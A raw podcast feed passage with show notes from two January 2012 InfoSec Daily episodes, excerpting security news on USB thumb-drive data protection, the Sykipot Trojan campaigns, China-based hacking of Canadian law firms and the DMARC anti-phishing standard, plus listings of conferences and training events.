<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.networkworld.com/research/2012/012712-how-to-prevent-thumb-drive-255414.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.networkworld.com/research/2012/012712-how-to-prevent-thumb-drive-255414.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For such a small device, the plastic, handheld USB flash drive can cause big security headaches. Even if you have robust end-point security and establish rigid policies about employee use of these drives, employees still find a way to copy financial reports and business plans for use at home. While other security breaches are more traceable, a flash drive is more difficult to monitor, especially after the employee leaves work.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here we profile four organizations that have taken slightly different approaches to dealing with thumb-drive security to match the organizations&#39; specific needs and policies.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. City of ColumbusApproach: Uses Intelligent ID software to categorize files, and then assign a level of encryption on the fly.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. TurkcellApproach: Uses classification software from Titus that monitors Microsoft Office business documents and alerts users when they try to copy that data to a thumb drive.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. CIGNAApproach: Allows employees to copy encrypted data, but they are prompted to type in a reason why they&#39;re copying. The reasons are later compared to the actual file transfers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. University of Alabama, Birmingham Health SystemApproach: Uses DeviceLock to monitor ports and encrypt data. Allows staff and students to use thumb drives at will, but all file transfers are monitored and recorded.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.symantec.com/connect/blogs/insight-sykipot-operations-0"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.symantec.com/connect/blogs/insight-sykipot-operations-0</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Sykipot campaign has been persistent in the past few months targeting various industries, the majority of which belong to the defense industry. Each campaign is marked with a unique identifier comprised of a few letters followed by a date hard-coded within the Sykipot Trojan itself. In some cases the keyword preceding the numbers is the sub-domain&#39;s folder name on the Web server being used. </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here are some examples of the campaigns we have seen so far:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">alt20111215</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">auto20110413</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">auto20110420</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">be20111010</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">chk20111219</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">chksrv20111122</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">easy20110720w</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">easy20110926n</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">good20110627</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">help20110908</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">help20110926</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">info20111025</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">info20111028</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">info20111031G</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">insight20111122</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">pretty20111101</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">pretty20111122</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">pub2011124x</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">server20111212</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">webmail20111122</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">world20111205</span></li>
</ul>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These campaign markers allow the attackers to correlate different attacks on different organizations and industries.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attackers also left additional clues allowing us to gain insight into what appears to be a staging server that is used prior to the delivery of new binaries to targeted users. In addition, we were able to confirm that the server was also used as a command and control (C&amp;C) server for a period of time as well. The server is based in the Beijing region of China and was running on one of the largest ISPs in China. Furthermore, on one occasion one of the attackers connected from the Zhejiang province. The server has hosted over a hundred malicious files from the past couple of months, many of which were used in Sykipot campaigns.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.bloomberg.com/news/2012-01-31/china-based-hackers-target-law-firms.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.bloomberg.com/news/2012-01-31/china-based-hackers-target-law-firms.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">China-based hackers looking to derail the $40 billion acquisition of the world&rsquo;s largest potash producer by an Australian mining giant zeroed in on offices on Toronto&rsquo;s Bay Street, home of the Canadian law firms handling the deal.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Over a few months beginning in September 2010, the hackers rifled one secure computer network after the next, eventually hitting seven different law firms as well as Canada&rsquo;s Finance Ministry and the Treasury Board, according to Daniel Tobok, president of Toronto-based Digital Wyzdom. His cyber security company was hired by the law firms to assist in the probe.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-582-dmarc-dhsbs-usb-fixers-skyipot-chinese-hack-lawyers/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3435/0/infosec-daily-podcast-episode-582.mp3" length="21128190" type="audio/mpeg" />
		<itunes:duration>0:43:58</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 582 for January 31, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why d[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 582 for January 31, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://news.cnet.com/8301-27080_3-57367842-245/antiphishing-standard-in-the-works-from-google-facebook-others/
&#160;
Google, Facebook, Microsoft, Yahoo, PayPal and others are working together on a standard that can be used across the Internet for blocking phishing e-mails.
&#160;
The 15 companies will be announcing on Monday DMARC.org, which stands for Domain-based Message Authentication, Reporting, and Conformance&#8211;a system for verifying that e-mails are coming from legitimate companies and not imposters trying to trick people into clicking a phishing link. Basically, the system offers a common way for companies to authenticate their legitimate communications with customers.
&#160;
Also in the DMARC working group are AOL, Bank of America, Fidelity Investments, American Greetings, LinkedIn, and e-mail secur[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 581 &#8211; The Big Picture, HOIC, The Clanks, .ru Abused, &amp; No Click Pwnage</title>
		<link>http://www.isdpodcast.com/episode-581-the-big-picture-hoic-the-clanks-ru-abused-no-click-pwnage</link>
		<comments>http://www.isdpodcast.com/episode-581-the-big-picture-hoic-the-clanks-ru-abused-no-click-pwnage#comments</comments>
		<pubDate>Tue, 31 Jan 2012 01:59:21 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3429</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 581 for January 30, 2012.&#160;&#160; Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Karthik Rangarajan, and Beau Woods. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.6508371450083918" style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: bold; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">InfoSec Daily Podcast Episode 581 for January 30, 2012.&nbsp;&nbsp; Tonight&#39;s podcast is hosted by Rick Hayes, </span><span id="internal-source-marker_0.0035412585784345696" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dave Kennedy, </span><span id="internal-source-marker_0.0035412585784345696" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Karthik Rangarajan, </span><span id="internal-source-marker_0.6508371450083918" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">and Beau Woods.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Subcommittee Markup: H.R. 3674, PrECISE Act of 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 1, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: 311 Cannon House Office Building, Washington, DC (also live streaming)</span><br />
	<a href="http://homeland.house.gov/markup/subcommittee-markup-hr-3674"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://homeland.house.gov/markup/subcommittee-markup-hr-3674</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
